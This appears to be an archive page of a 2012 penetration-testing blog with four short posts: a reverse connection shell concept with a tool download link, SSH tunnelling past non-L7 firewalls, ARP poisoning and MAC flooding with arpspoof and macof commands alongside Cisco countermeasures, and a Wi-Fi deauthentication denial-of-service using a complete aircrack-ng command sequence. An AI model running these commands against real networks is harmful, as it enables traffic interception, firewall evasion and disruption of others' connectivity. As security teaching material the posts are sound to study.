Friday, October 19, 2012

Reverse Connection Shell

Problem :
Unreachable Server Behind Firewall (Simulation of Reverse Shell)
A solution to this problem is to have the server(victim) reach out and connect to the client. In such a case, the client(attacker) will listen on a port, say, port 80, and the server will then attempt to connect every 5 seconds. If the client is not up, the server waits 5 seconds and then tries again. If a client is up, it will then establish a connection and gives a shell to the client. The client will then be able to send commands, and they will execute on the server side. This technology is called Reverse Connection Shell.

Download from the link below

Download ReverseShell Tools by Cagdas Ulucan

Monday, October 15, 2012

Bypass none L7 Firewall/Proxy systems (SSH Tunnelling)

By tunneling technics it's possible to penetrate none L7 firewalls as they don't inspect the content of the packet.
as usually port 80 and 443 is allowed for internal users and also SSH protocol supports socks proxy, this can be used to connect remote ssh servers that runs from port:443, you may place your own or find public ssh servers on net

here is the screenshot doing it via putty


some other ways of penetration may be using proxy softwares like ultrasurf, making vpn to outside,using remote connection softwares like teamviewer (reverse connection), note that all of these techniques uses port 443

I wanted to draw your attention to importance of inspecting SSL traffic as it can be used for several illegal connections that can cause data leakage in your network


Tuesday, October 9, 2012

How to Convert victim switch to a HUB

First way
ARP Poisoning (arpspoof)
Attack is based on weakness of ARP protocol, its so old and limited to local network segments but still one of the biggest threat on L2 networks
Enable routing on the attacker so that it can route the traffic back to victim, its required if you dont want to make DOS, to silently listen the traffic.
"echo 1 > /proc/sys/net/ipv4/ip_forward" # enable IP forwarding in the Linux kernel.
to test whats going on at the victim machine type arp -a and check the mac of the victims gw once started to poison it will change the value to attackers mac address

Lets start
first SSH
# arpspoof -t victimip gwip
Second SSH
# arpspoof -t gwip victimip

Protection from ARP Poisoning
Open Dynamic ARP Inspection on the related switch,

If you have a dhcp server
Cisco(config)# IP dhcp snooping vlan
Cisco(config)# IP arp inspection vlan
Cisco(config)# interface GigabitEthernet 1/11
Cisco(config-if)# IP dhcp snooping trust
Cisco(config-if)# IP arp inspection trust

If not, you have to manually set static ip-mac addresses
Cisco(config)# IP arp inspection vlan
Cisco(config)# IP source binding vlan interface Gi1/1
Cisco(config)# arp access-list
Cisco(config-arp-acl)# permit IP host mac host
Cisco(config)# IP arp inspection filter vlan

Second way
Mac Flooding is to attack with lots of bogus ARP packets on a switch network, thus overloading the switch CAM tables and making it acting like a hub.
A typical switch can handle few thousands of ARP records and can be overloaded.
Once its overloaded you may start sniffing..

you may use the tool macof
#macof -i eth0

Protection of this attack is simply enabling Port Security

Thursday, October 4, 2012

DOS on Wireless Networks (wlan jammer)

Deauthentication attack on wireless networks
As a result everyone from your attacked network will be kicked out from it,we may say that Its simply a DoS

The connection between the Mesh clients and Mesh APs has been be established by the exchange of various frames.After that the exchange of the series of management frames like authentication and association request frame takes place.As these frames are unprotected and sent in clear. So these frames has been spoofed by the attacker. The attacker then sends deauthentication requests with the client’s address set as the source. Then the mesh AP responds by sending the deauthentication response to the client. Thus the communication between the client and the AP has been halted. As deauthentication requests are notifications, so cannot be ignored and the AP responds instantly to these requests . The attacker can periodically scan all the channels and send these spoofed messages to valid clients thus terminating their connection.

During the attack the client has been deauthenticated and thus may probe other networks and connect to any other mesh AP available in the range with good signal strength.Second stage of this DOS can be Rogue AP Attack.

# airmon-ng  (shows your wlan interfaces)
# airmon-ng start wlan0 (enable monitoring mode on wlan0)
# airodump-ng mon0  (Get the related info of victim AP)
# airodump-ng -c 11 -b 1C:65:9D:B5:D8:C1 mon0   (go inside the related AP, define channel and MAC)
# aireplay-ng --deauth 100 -c FF:FF:FF:FF:FF:FF -a 1C:65:9D:B5:D8:C1 mon0  (start sending deauthentication packets,Open a separate ssh session)

I also decided to write other than Checkpoint,
more pentest related notes will be on this site.